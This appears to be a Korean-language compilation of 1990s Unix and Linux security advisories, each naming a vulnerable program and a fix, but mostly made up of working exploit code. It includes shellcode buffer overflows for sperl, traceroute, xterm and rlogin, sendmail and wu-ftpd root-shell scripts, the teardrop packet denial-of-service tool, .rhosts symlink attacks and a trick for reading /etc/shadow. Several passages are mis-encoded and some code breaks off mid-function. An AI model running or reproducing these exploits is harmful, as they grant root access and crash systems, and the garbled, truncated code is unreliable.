이런것이 해킹이에요.
과거에 나우누리 계정 서버 해킹해서 난리났던 고등학생은 이런 해킹이었죠.
너무 간단하죠?
해킹이라는 건 이정도가지고 볼 수가 없어요.
아주 일부분에 불과하니까요
하지만 이런 것을 성공했다고 우쭐대는 사람들이 많아서 좀 그렇네요.
해결책
nobody의 UID를 99 로 해두어라.
---------------------------
제 목: [보안] 리눅스 perl 5.003
명령
sperl5.003
적용되는 호스트
Linux Slackware 3.1, 3.2
레드햇 리눅스
문제점
sperl5.003 이라는 파일을 버퍼 오버플로우를 시킬수 있다.
#include
#define DEFAULT_OFFSET 640
#define DEFAULT_BUFFER_SIZE 1600
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
/*
 * Proof-of-concept driver from the advisory: builds one argument of
 * DEFAULT_BUFFER_SIZE (1600) bytes and hands it to sperl5.003 via execl().
 * argc/argv are not read; offset and bsize stay at their defaults.
 *
 * Defender's view: the trigger is an over-long command-line argument to a
 * binary that the advisory says carries the suid bit. The advisory's remedy
 * is to remove that bit or move to 5.003_97f.
 */
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i;
/* One heap buffer of bsize bytes becomes the single argument. */
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
/* Every 4-byte slot of the buffer is first set to the same value. */
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
/* The first half is then overwritten with the NOP byte (0x90). */
for (i = 0; i < bsize/2; i++)
buff[i] = NOP;
/* The shellcode[] bytes are copied around the midpoint of the buffer. */
ptr = buff + ((bsize/2) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
/* NUL-terminate so the buffer can be passed as a C string. */
buff[bsize - 1] = '\0';
/*
 * The whole buffer is passed as argv[1]; an argument of this length,
 * consisting mostly of repeated bytes, is what process or audit records
 * would show for this invocation.
 */
execl("/usr/bin/sperl5.003","/usr/sbin/sperl5.003",buff, NULL);
}
해결
sperl5.003 의 suid bit를 없애라.
아니면 5.003_97f 의 버젼으로 바꾸어라.
---------------------------
제 목: [보안] 리눅스 sysctl()
명령
sysctl()
적용되는 시스템
Linux prior to 2.0.31
문제점
sysctl()이라는 함수에 문제가 있다. syslog flooding이 가능하며..
오버플로우를 일으킬수 있는 보안상 문제점이 발견되었다.
#include
/*
 * Minimal reproducer from the advisory: a single sysctl() call whose name
 * length argument is 0x80000000, i.e. negative when read as an int.
 * The kernel snippet quoted later on this page shows the vulnerable test
 * `nlen == 0 || nlen >= CTL_MAXNAME`, which a negative nlen passes, and the
 * corrected test `nlen <= 0 || nlen >= CTL_MAXNAME`.
 */
main() {
sysctl(NULL, 0x80000000, NULL, NULL, NULL, 0);
/* 0x80000000 can be replaced with 0xC0000000 -- both are negative,
* and
* produce a zero when multiplied by sizeof(int) */
}
이와 같은 문제점은 getgroups()라는 함수에서도 마찬가지다.
해결
반드시 2.0.31 인 사람만 고쳐라.
/usr/src/linux/kernel.sysctl.c 의 파일안에
struct ctl_table_header *tmp;
void *context;
if (nlen == 0 || nlen >= CTL_MAXNAME) <= 이것을
if (nlen <= 0 || nlen >= CTL_MAXNAME) <= 이렇게 고쳐라.
return -ENOTDIR;
error = verify_area(VERIFY_READ,name,nlen*sizeof(int));
그리고 다시 컴파일 시켜라. 커널 컴파일.
---------------------------
제 목: [보안] 리눅스&유닉스 sendmail (1)
명령
sendmail( 8.7 ~ 8.8.2)
영향있는 시스템
센드 메일을 탑재한 모든 유닉스
문제점
다음과 같은 간단한 스크립트로 루트를 획득할수 있다.
#/bin/sh
#
#
# Hi !
# This is exploit for sendmail smtpd bug
# (ver. 8.7-8.8.2 for FreeBSD, Linux and may be other platforms).
# This shell script does a root shell in /tmp directory.
# If you have any problems with it, drop me a letter.
# Have fun !
#
#
# ----------------------
# ---------------------------------------------
# ----------------- Dedicated to my beautiful lady
------------------
# ---------------------------------------------
# ----------------------
#
# Leshka Zakharoff, 1996. E-mail: leshka@leshka.chuvashia.su
#
#
#
echo 'main() '>>leshka.c
echo '{ '>>leshka.c
echo ' execl("/usr/sbin/sendmail","/tmp/smtpd",0); '>>leshka.c
echo '} '>>leshka.c
#
#
echo 'main() '>>smtpd.c
echo '{ '>>smtpd.c
echo ' setuid(0); setgid(0); '>>smtpd.c
echo ' system("cp /bin/sh /tmp;chmod a=rsx /tmp/sh"); '>>smtpd.c
echo '} '>>smtpd.c
#
#
cc -o leshka leshka.c;cc -o /tmp/smtpd smtpd.c
./leshka
kill -HUP `ps -ax|grep /tmp/smtpd|grep -v grep|tr -d ' '|tr -cs
"[:digit:]" "\n
"|head -n 1`
rm leshka.c leshka smtpd.c /tmp/smtpd
/tmp/sh
해결책
높은 버젼의 센드메일을 설치하는 길 밖에 없다.
---------------------------
제 목: [보안] 리눅스&유닉스 wu-FTP
명령
wu-FTP ( site exec )
영향있는 시스템
wu-ftp2.x 를 깔은 모든 유닉스 버젼
문제점
site exec 의 큰 버그로 루트 권한으로 돌아가는 ftp의 잘못된 오류로
루트권한으로 호스트의 프로그램을 실행시킬수가 있다.
cat > bug.c
#include
#include
#include
/*
 * Helper program that the advisory has wu-ftpd run through "site exec".
 * It sets the effective uid to 0, copies /bin/sh to /tmp/.sh and sets
 * mode 6777 on the copy.
 *
 * Detection: a hidden set-uid/set-gid copy of a shell under /tmp
 * (here /tmp/.sh) is the artifact this leaves behind; the transcript on
 * this page also shows the "site exec" commands that would appear in the
 * FTP session.
 */
main()
{
seteuid(0);
system("cp /bin/sh /tmp/.sh");
system("chmod 6777 /tmp/.sh");
}
À§ÀÇ ¼Ò½º¸¦ cc -o bug bug.c Î ÄÄÆÄÀÏ ÈÄ¿¡ ftp Î ÀÚ½ÅÀÇ È£½ºÆ®¿¡ Á¢¼Ó
ÇÑ´Ù.
±× ¿¹ÀÌ´Ù.
ftp 0
220 exploitablesys FTP server (Version wu-2.4(1) Sun Jul 31 21:15:56 CDT 1994) r
eady.
Name (0:guest): guest
331 Password required for guest.
Password: (password)
230 User guest logged in.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> quote "site exec bash -c id" (see if sys is exploitable)
200-bash -c id
200-uid=0(root) gid=0(root) euid=505(adm) egid=100(users) groups=100(users)
200 (end of 'bash -c id')
ftp> quote "site exec bash -c /home/guest/bug"
200-bash -c /home/guest/bug
200 (end of 'bash -c /home/guest/bug')
ftp> quit
À§¿Í °°ÀÌ Çϸé bug¶ó´Â ÇÁαץÀÌ çÆ® ±ÇÇÑÀ¸Î µ¹¾Æ°¡°Ô µÈ´Ù.
±×¸°Ô µÇ¸é /tmp µðºÅ丮¿¡ çÆ®±ÇÇÑÀÇ ½©ÀÌ ¸¸µé¾îÁø´Ù.
해결
ftp 버젼을 최신으로 맞추어라.
2.4.2버젼이면 무난하다.
또한 의심하는 아이디는 site 명령을 사용하지 못하게 제한을 두어라
---------------------------
제 목: [보안] 리눅스&유닉스 sendmail (2)
명령
sendmail 8.8.4
시스템
센드메일 8.8.4를 운영하는 모든 시스템
문제점
센드 메일의 잘못된 버그로 인해 /var/tmp에 dead.letter이라는 파일을
만드는데 이는 루트의 권한이다.
±× ¿¹
ln -s /.rhosts /var/tmp/dead.letter
telnet white.hacker.securi.ty 25
mail from : security@wh.it.e.best
rcpt to : Fuck@fuck.you.haha
data
dlfjs qjrmrk dlTska..
.
quit
À̸°Ô ÇÔÀ¸Î½á çÆ® µðºÅ丮¿¡ .rhosts ÆÄÀÏÀ» ¸¸µé¼ö ÀÖ´Ù.
À̸¦ Á»´õ ÀÀ¿ëÇϸé Æнº¿öµå ÆÄÀÏÀ» ¼Õº¼¼ö ÀÖ´Ù.
해결책
센드메일 을 8.8.5 이상으로 올려라.
---------------------------
제 목: [보안] 리눅스 Lizards game
명령
Lizards game
시스템
슬랙웨어 3.4
문제점
Lizards 게임은 setuid가 걸려있는 프로그램이다.
setuid 가 걸려 있는 이유는 바로 이 게임이 svgalib를 사용하기 때문이다.
그런데 그 게임의 소스를 보면 system(clear);라고 함수를 사용했다.
이는 사용자의 입장으로 보면 간단히 구멍을 발견할 수 있다.
path=. 라고 두고 clear 스크립트를 작성하여 그 clear스크립트를
루트의 권한으로 돌릴수 있다.
해결책
우선 그 파일의 퍼미션을 닫아두어라.
chmod -s /usr/games/lizardlib/lizardshi
---------------------------
제 목: [보안] 리눅스 IP fragment overlap
명령
IP fragment overlap
시스템
리눅스 / 윈도우 NT / 윈도우 95 / 기타 유닉스 시스템
문제점
아래의 프로그램을 돌려서 시스템을 멈추게 할 수 있다.
/*
* Copyright (c) 1997 route|daemon9
* 11.3.97
*
* Linux/NT/95 Overlap frag bug exploit
*
* Exploits the overlapping IP fragment bug present in all Linux
* kernels and NT 4.0 / Windows 95 (others?)
*
* Based off of: flip.c by klepto
* Compiles on: Linux, *BSD*
*
* gcc -O2 teardrop.c -o teardrop
* OR
* gcc -O2 teardrop.c -o teardrop -DSTRANGE_BSD_BYTE_ORDERING_THING
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#ifdef STRANGE_BSD_BYTE_ORDERING_THING
/* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0
*/
#define FIX(n) (n)
#else /* OpenBSD 2.1, all Linux */
#define FIX(n) htons(n)
#endif /* STRANGE_BSD_BYTE_ORDERING_THING */
#define IP_MF 0x2000 /* More IP fragment en route */
#define IPH 0x14 /* IP header size */
#define UDPH 0x8 /* UDP header size */
#define PADDING 0x1c /* datagram frame padding for first packet */
#define MAGIC 0x3 /* Magic Fragment Constant (tm). Should be 2 or 3 *
/
#define COUNT 0x1 /* Linux dies with 1, NT is more stalwart and can
* withstand maybe 5 or 10 sometimes... Experiment.
*/
void usage(u_char *);
u_long name_resolve(u_char *);
u_short in_cksum(u_short *, int);
void send_frags(int, u_long, u_long, u_short, u_short);
int main(int argc, char **argv)
{
int one = 1, count = 0, i, rip_sock;
u_long src_ip = 0, dst_ip = 0;
u_short src_prt = 0, dst_prt = 0;
struct in_addr addr;
fprintf(stderr, "teardrop route|daemon9\n\n");
if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0)
{
perror("raw socket");
exit(1);
}
if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(on
e))
< 0)
{
perror("IP_HDRINCL");
exit(1);
}
if (argc < 3) usage(argv[0]);
if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]
)))
{
fprintf(stderr, "What the hell kind of IP address is that?\n");
exit(1);
}
while ((i = getopt(argc, argv, "s:t:n:")) != EOF)
{
switch (i)
{
case 's': /* source port (should be emphemeral) */
src_prt = (u_short)atoi(optarg);
break;
case 't': /* dest port (DNS, anyone?) */
dst_prt = (u_short)atoi(optarg);
break;
case 'n': /* number to send */
count = atoi(optarg);
break;
default :
usage(argv[0]);
break; /* NOTREACHED */
}
}
srandom((unsigned)(time((time_t)0)));
if (!src_prt) src_prt = (random() % 0xffff);
if (!dst_prt) dst_prt = (random() % 0xffff);
if (!count) count = COUNT;
fprintf(stderr, "Death on flaxen wings:\n");
addr.s_addr = src_ip;
fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt);
addr.s_addr = dst_ip;
fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt);
fprintf(stderr, " Amt: %5d\n", count);
fprintf(stderr, "[ ");
for (i = 0; i < count; i++)
{
send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt);
fprintf(stderr, "b00m ");
usleep(500);
}
fprintf(stderr, "]\n");
return (0);
}
/*
* Send two IP fragments with pathological offsets. We use an implementati
on
* independent way of assembling network packets that does not rely on any
of
* the diverse O/S specific nomenclature hinderances (well, linux vs. BSD).
*/
void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt,
u_short dst_prt)
{
u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */
u_char byte; /* a byte */
struct sockaddr_in sin; /* socket protocol structure */
sin.sin_family = AF_INET;
sin.sin_port = src_prt;
sin.sin_addr.s_addr = dst_ip;
/*
* Grab some memory for our packet, align p_ptr to point at the beginnin
g
* of our packet, and then fill it with zeros.
*/
packet = (u_char *)malloc(IPH + UDPH + PADDING);
p_ptr = packet;
bzero((u_char *)p_ptr, IPH + UDPH + PADDING);
byte = 0x45; /* IP version and header length */
memcpy(p_ptr, &byte, sizeof(u_char));
p_ptr += 2; /* IP TOS (skipped) */
*((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING); /* total length */
p_ptr += 2;
*((u_short *)p_ptr) = htons(242); /* IP id */
p_ptr += 2;
*((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */
p_ptr += 2;
*((u_short *)p_ptr) = 0x40; /* IP TTL */
byte = IPPROTO_UDP;
memcpy(p_ptr + 1, &byte, sizeof(u_char));
p_ptr += 4; /* IP checksum filled in by kernel *
/
*((u_long *)p_ptr) = src_ip; /* IP source address */
p_ptr += 4;
*((u_long *)p_ptr) = dst_ip; /* IP destination address */
p_ptr += 4;
*((u_short *)p_ptr) = htons(src_prt); /* UDP source port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */
p_ptr += 2;
*((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */
if (sendto(sock, packet, IPH + UDPH + PADDING, 0, (struct sockaddr *)&si
n,
sizeof(struct sockaddr)) == -1)
{
perror("\nsendto");
free(packet);
exit(1);
}
/* We set the fragment offset to be inside of the previous packet's
* payload (it overlaps inside the previous packet) but do not include
* enough payload to cover complete the datagram. Just the header will
* do, but to crash NT/95 machines, a bit larger of packet seems to wor
k
* better.
*/
p_ptr = &packet[2]; /* IP total length is 2 bytes into the heade
r */
*((u_short *)p_ptr) = FIX(IPH + MAGIC + 1);
p_ptr += 4; /* IP offset is 6 bytes into the header */
*((u_short *)p_ptr) = FIX(MAGIC);
if (sendto(sock, packet, IPH + MAGIC + 1, 0, (struct sockaddr *)&sin,
void usage(u_char *name)
{
fprintf(stderr,
"%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\
n",
name);
exit(0);
}
해결책
커널을 2.0.32-pre4 로 업해라.
or
소스를 다음과 같이 바꿔서 다시 컴파일 시켜라
--- ip_fragment.c Mon Nov 10 14:58:38 1997
+++ ip_fragment.c.patched Mon Nov 10 19:18:52 1997
@@ -12,6 +12,7 @@
* Alan Cox : Split from ip.c , see ip_input.c for
history.
* Alan Cox : Handling oversized frames
* Uriel Maimon : Accounting errors in two fringe case
s.
+ * route : IP fragment overlap bug
*/
#include
@@ -578,6 +579,22 @@
frag_kfree_s(tmp, sizeof(struct ipfrag));
}
}
+
+ /*
+ * Uh-oh. Some one's playing some park shenanigans on us.
+ * IP fragoverlap-linux-go-b00m bug.
+ * route 11.3.97
+ */
+
+ if (offset > end)
+ {
+ skb->sk = NULL;
+ printk("IP: Invalid IP fragment (offset > end) found from %
s\n", in_ntoa(iph->saddr));
+ kfree_skb(skb, FREE_READ);
+ ip_statistics.IpReasmFails++;
+ ip_free(qp);
+ return NULL;
+ }
/*
* Insert this fragment in the chain of fragments.
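Review bot: The `printk` added in the `offset > end` branch runs once for every malformed fragment and is reachable by any remote sender, so the guard that stops the crash also gives an unauthenticated way to flood the kernel log; `ip_statistics.IpReasmFails++` already records the event. I would either drop the message or throttle it, for example `static unsigned long last; if (jiffies - last > HZ) { last = jiffies; printk(...); }`, and give it an explicit level such as `KERN_WARNING`. `offset` and `end` are computed above the hunk, so whether this comparison covers every overlap case cannot be confirmed from the lines shown.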
---------------------------
제 목: [보안] 리눅스 pppd chatscript
명령
데비안 pppd chatscript
시스템
데비안 리눅스
문제점
/var/log/ppp.log 파일을 누구나 다 읽을수 있게 해놓았다.
$> more /var/log/ppp.log
¾î¼±¸ Àú¼±¸.
Dec 14 16:43:14 gateway chat[362]: ^Mlogin -- got it
Dec 14 16:43:14 gateway chat[362]: send (loginname^M)
Dec 14 16:43:15 gateway chat[362]: expect (word)
Dec 14 16:43:15 gateway chat[362]: : loginname^M
Dec 14 16:43:15 gateway chat[362]: Password -- got it
Dec 14 16:43:15 gateway chat[362]: send (³ªÀÇÆнº¿öµå^M)
À̱ Çü½ÄÀ¸Î ³»¿ëÀ» º¸¸é Æнº¿öµå°¡(^^;) º¸ÀδÙ.
해결책
패치된 버젼이 없는것 같다. ^^;
지금은 나왔을 것이다. 버젼을 올려라
---------------------------
제 목: [보안] 리눅스 X 서버
명령
X서버- XFree 3.3.1 3.2.9 3.1.2 의 XF86_시리즈
시스템
엑스서버를 쓰는 모든 유닉스및 리눅스
문제점
다음과 같은 편법으로 첫줄의 파일을 볼수가 있다.
$ ls -al /etc/shadow
-rw------- 1 root bin 1039 Aug 21 20:12 /etc/shadow
$ id
uid=502(loveyou) gid=500(users) groups=500(users)
$ cd /usr/X11R6/bin
$ ./XF86_SVGA -config /etc/shadow
Unrecognized option: root:qEXaUxSeQ45ls:10171:-1:-1:-1:-1:-1:-1
use: X [:] [option]
-a # mouse acceleration (pixels)
-ac disable access control restrictions
-audit int set audit trail level
-auth file select authorization file
bc enable bug compatibility
-bs disable any backing store support
-c turns off key-click
이런 형식이다..
해결책
Setuid 를 없애던지 특정 이용자만 쓰도록 허락해라.
---------------------------
제 목: [보안] 리눅스 레드햇 5.0 유틸리티
명령
/bin/ping, /usr/sbin/traceroute, /usr/bin/rlogin, /usr/bin/rsh
(actually glibc2 is guilty one)
시스템
레드햇 5.0
문제점
버퍼 오버런을 이용해서 루트를 얻는다.
/*
Just Your Standard EGGSHELL Proggie:
traceroute buffer overflow exploit for RedHat Linux 5.0
mostly ripped from Aleph One
Wilton Wong
wwong@blackstar.net
gcc -o trace_shell trace_shell.c
*/
#include
#define DEFAULT_OFFSET 0
#define DEFAULT_BUFFER_SIZE 1019
#define DEFAULT_EGG_SIZE 2048
#define NOP 0x90
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr, *egg;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
int i, eggsize=DEFAULT_EGG_SIZE;
if (argc > 1) bsize = atoi(argv[1]);
if (argc > 2) offset = atoi(argv[2]);
if (argc > 3) eggsize = atoi(argv[3]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
if (!(egg = malloc(eggsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
addr = get_sp() - offset;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
ptr = egg;
for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)
*(ptr++) = NOP;
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
egg[eggsize - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
memcpy(buff,"RET=",4);
putenv(buff);
printf("Now run: /usr/sbin/traceroute $RET\n");
system("/bin/bash");
}
해결책
패치 방법
$ diff -u /dbase/glibc-2.0.6pre4/resolv/res_query.c /usr/glibc/src/libc/resolv/
--- /dbase/glibc-2.0.6pre4/resolv/res_query.c Mon Jan 6 23:05:43 1997
+++ /usr/glibc/src/libc/resolv/res_query.c Mon Dec 8 09:05:53 1997
@@ -321,7 +321,7 @@
u_char *answer; /* buffer to put answer */
int anslen; /* size of answer */
{
- char nbuf[MAXDNAME];
+ char nbuf[MAXDNAME * 2 + 2]; /*À̺κÐÀ» À§¿Í ¹Ù²Ù¸é µÈ´Ù.*/
const char *longname = nbuf;
int n;
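Review bot: Enlarging `nbuf` to `MAXDNAME * 2 + 2` closes the overflow only as long as the code that fills it, which lies outside this hunk, never writes more than two MAXDNAME-sized names plus a separator and a terminator. I would keep the larger buffer and also reject over-long input before formatting, e.g. `if (strlen(name) + strlen(domain) + 2 > sizeof(nbuf)) return (-1);`, assuming the enclosing function is the resolver's name/domain join and those are its parameter names. The comment on the added line is mis-encoded and is better replaced by an English one such as `/* room for name + '.' + domain + NUL */`.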
---------------------------
제 목: [보안] 리눅스 crontab
명령
dillon crontab / crond ( dcron 2.2 )
시스템
슬렉웨어 3.4
문제점
버퍼 오버 플로우를 이용해서 루트를 얻을수 있다.
잠재적인 버퍼 오버 플로우의 가능성이 보인다.
해결책
다음의 사이트에서 패치 버젼을 받는다.
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/slakware/a2/bin.tgz
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.tar.gz
ftp://ftp.cdrom.com/pub/linux/slackware-3.4/source/a/bin/dcron22.diff.gz
---------------------------
제 목: [보안] 솔라리스 xterm
명령
xterm
시스템
솔라리스 2.5.1(SunOS 5.5.1)
문제점
버퍼 오버 플로우를 일으켜 보안상 헛점을 만들수 있다.
그 예제이다.
/*
* X11R6.3 xterm exploit for solaris 2.5.1 by DCRH 28/5/97
*
*/
#include
#include
#include
#include
#define EXTRA2 1300
#define BUF_LENGTH 400
#define EXTRA 500
/* Need an addr such that contents of addr+0xe98 = 0 */
#define SAFE_ADDR ((unsigned)0xefff2008)
#define STACK_OFFSET 0x4800
#define SPARC_NOP 0xa61cc013
u_long sparc_shellcode[] =
{
"½©ÄÚµå"
};
u_long get_sp(void)
{
asm("mov %sp,%i0 \n");
}
char buf[BUF_LENGTH + EXTRA + EXTRA2 + 8];
char longvar[0x4000] = "BLAH=";
void main(int argc, char *argv[])
{
char *env[2];
unsigned long targ_addr;
u_long *long_p;
int i, code_length = sizeof(sparc_shellcode),dso=0;
if(argc > 1) dso=atoi(argv[1]);
long_p =(u_long *) buf;
for (i = 0; i < EXTRA2 / sizeof(u_long); i++)
*long_p++ = (SAFE_ADDR >> 8) | (SAFE_ADDR << 24);
targ_addr = get_sp() - STACK_OFFSET - dso;
for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
for (i = 0; i < code_length / sizeof(u_long); i++)
*long_p++ = sparc_shellcode[i];
for (i = 0; i < EXTRA / sizeof(u_long); i++)
*long_p++ = targ_addr;
printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n",
targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET);
/* This is just to shove the stack down a bit */
memset(&longvar[5], 'a', sizeof longvar-6);
longvar[sizeof longvar -1] = '\0';
env[0] = longvar;
env[1] = NULL;
execle("./xterm", "xterm", "-xrm", buf,(char *) 0, env);
perror("execl failed");
}
해결책
다음의 사이트에서 와퍼를 구해다가 설치하라.
ftp://ftp.auscert.org.au/pub/auscert/tools/overflow_wrapper
/overflow_wrapper.c
or
http://cegt201.bradley.edu/~im14u2c/wrapper/
---------------------------
제 목: [보안] 솔라리스 ff.core
명령
/usr/openwin/bin/ff.core
시스템
솔라리스 2.4
문제점
IFS=/을 이용해서 /usr/??프로그램을 돌리려는 ff.core 파일의 본래 취지를
벗어나 usr 프로그램을 돌리고 그 뒤의 것들은 인수로써 작용하게 만든다.
다음은 그 예제이다.
% ksh
% cd /tmp
% cp /bin/ksh .
% echo "chown root ksh; chmod u+s ksh" > usr
% chmod +x usr
% export IFS=/
% ÇÑÁÙÀÇ ¾î¶² ¸íÉ ..
% ./ksh
#
해결책
패치해라.
---------------------------
제 목: [보안] 솔라리스 gethostbyname()
명령
gethostbyname()
시스템
솔라리스 2.5 2.5.1
문제점
버퍼 오버 플로우를 일으켜서 쉘을 실행시킨다..루트 소유로.
그 예제이다.
/*
* rlogin-exploit.c: gets a root shell on most Solaris 2.5/2.5.1 machines
* by exploiting the gethostbyname() overflow in rlogin.
*
* gcc -o rlogin-exploit rlogin-exploit.c
*
* Jeremy Elson, 18 Nov 1996
* jeremy.elson@nih.gov
*/
#include
#include
#include
#include
#define BUF_LENGTH 8200
#define EXTRA 100
#define STACK_OFFSET 4000
#define SPARC_NOP 0xa61cc013
u_char sparc_shellcode[] ="½©ÄÚµå";
u_long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
void main(int argc, char *argv[])
{
char buf[BUF_LENGTH + EXTRA];
long targ_addr;
u_long *long_p;
u_char *char_p;
int i, code_length = strlen(sparc_shellcode);
long_p = (u_long *) buf;
for (i = 0; i<(BUF_LENGTH - code_length) / sizeof(u_long); i++)
*long_p++ = SPARC_NOP;
char_p = (u_char *) long_p;
for (i = 0; i out & (and go to sleep).
#
# version 3.91, 3.92 .....
# version 3.95 fixed
#
# Note: must do some changes in the script. look 4 CHANGE THIS:
#
# Yea i know is a lame script but is better than nothing..
# try to exploit the bug without a script and you will wait
# forever.
# e-torres@uniandes.edu.co
#
argumentos=0
if [ $# -eq $argumentos ]
then
echo "Usage: $0 username path/file_to_create & "
echo "ET Lownoise 1996 Colombia"
exit
fi
username=$1
archivo=$2
#CHANGE THIS:
#text='text to puit in file to create'
#usr=path of the program users
#pineprog=how the pine program appears when u do a w (who) command
text='+ +'
usr=users
pineprog=pine
#
date
echo "- Looking for $1 to log in... just wait"
#
entrada=0
entro=0
until [ $entro -eq $entrada ]
do
for nombre in `$usr`
do
if [ $nombre = $1 ]
then
entro=1
fi
done
done
date
echo "- Ok $username is logged now."
#
echo "- Lets wait that $1 run pine. "
noejecuto=0
ejecuto=0
until [ $ejecuto -ne $noejecuto ]
do
해결책
Pine의 버젼을 3.95이상으로 바꾸어라.
---------------------------
제 목: [보안] 솔라리스 sendmail
명령
sendmail ( 8.7.x ~ 8.8.2?)
시스템
솔라리스 2.5 2.5.1
문제점
센드 메일상의 버그로 루트쉘을 생성할 수 있다.
다음은 그 예제이다.
#/bin/sh
#
# Modify RUN in x.c for what you wanna run, and possibly the
# location or format of the ps command in the KILL line below for
# your platform.
#
# Or you could remove x.c alltogether and just put what you wanna
# do as root in smtpd.c (Ie: 'echo "+ +" >>/.rhosts' works nicely)
#
#
cat << _EOF_ >/tmp/x.c
#define RUN "/bin/ksh"
#include
main()
{
execl(RUN,RUN,NULL);
}
_EOF_
#
cat << _EOF_ >/tmp/spawnfish.c
main()
{
(ÀÏÃÀÇ °úÁ¤ ..)
}
_EOF_
#
cat << _EOF_ >/tmp/smtpd.c
main()
{
setuid(0); setgid(0);
system("chown root /tmp/x ;chmod 4755 /tmp/x");
}
_EOF_
#
#
gcc -O -o /tmp/x /tmp/x.c
gcc -O3 -o /tmp/spawnfish /tmp/spawnfish.c
gcc -O3 -o /tmp/smtpd /tmp/smtpd.c
#
/tmp/spawnfish
kill -HUP `/usr/ucb/ps -ax|grep /tmp/smtpd|grep -v grep|sed s/"[ ]*"// |cut
-d" " -f1`
rm /tmp/spawnfish.c /tmp/spawnfish /tmp/smtpd.c /tmp/smtpd /tmp/x.c
sleep 5
if [ -u /tmp/x ] ; then
echo "leet..."
/tmp/x
fi
해결책
센드메일의 버젼을 8.8.5 이상으로 올리면 된다.
---------------------------
제 목: [보안] 솔라리스 admintool
명령
admintool
시스템
솔라리스 2.5
문제점
다음과 같은간단한 경위로 .rhosts파일을 생성하여 루트를 획득할수 있다.
setenv DISPLAY yourdisplay:0.0
ln -s /.rhosts /tmp/.group.lock
/usr/bin/admintool
(ÀÏÃÀÇ °úÁ¤ )
echo "+ +" >> .rhosts
/usr/bin/rsh localhost -l root "(/usr/openwin/bin/xterm&)"
해결책
setuid를 없애던지 패치를 하라.
---------------------------
제 목: [보안] 솔라리스 imstat(라이센스 매니져)
명령
imstat(라이센스 매니져)
시스템
솔라리스 2.4
문제점
/var/tmp 에 임시 파일을 만든다..이를 이용해서 .rhosts를 링크시켜
생성할 수 있다.
rm /var/tmp/locksuntechd
ln -s /.rhosts /var/tmp/locksuntechd
(ÀÏÃÀÇ °úÁ¤ )
해결책
퍼미션을 닫어라
---------------------------
제 목: [보안] 솔라리스 quota
명령
quota
시스템
솔라리스 2.5(.1 ??)
문제점
쿼터제한을 피하면서 파일을 생성할 수 있다.
그 예제이다.
/**************************************************************************
* This exploit takes advantage of the latest sendmail hole, to hide *
* warez from your quota program, effectivly making your quota infinate.. *
* *
* To compile: *
* cc -o bigquota quota.c *
* To run: *
* ./bigquota file *
* where file is the file you wish to hide from your quota program. *
* *
* Please note that this may take a minute. *
* If you have any problems, talk to me, TSK, on IRC. *
**************************************************************************/
#include
#include
#include
#include
#include
int seedsc[201]={52,3,3,77,115,13,71,15,41,51,61,29,103,13,100,47,124,42,86,\
44,45,11,7,50,17,123,87,66,32,78,109,62,53,43,84,72,71,0,88,41,1,33,9,52,118,\
65,120,119,68,84,15,11,27,101,0,106,46,19,75,16,25,55,81,74,113,88,96,19,91,\
118,73,58,41,90,88,87,118,103,58,50,71,41,86,33,115,9,105,29,48,113,5,98,50,\
94,79,18,111,99,11,126,111,109,90,46,18,43,43,59,113,76,96,18,27,36,7,74,79,\
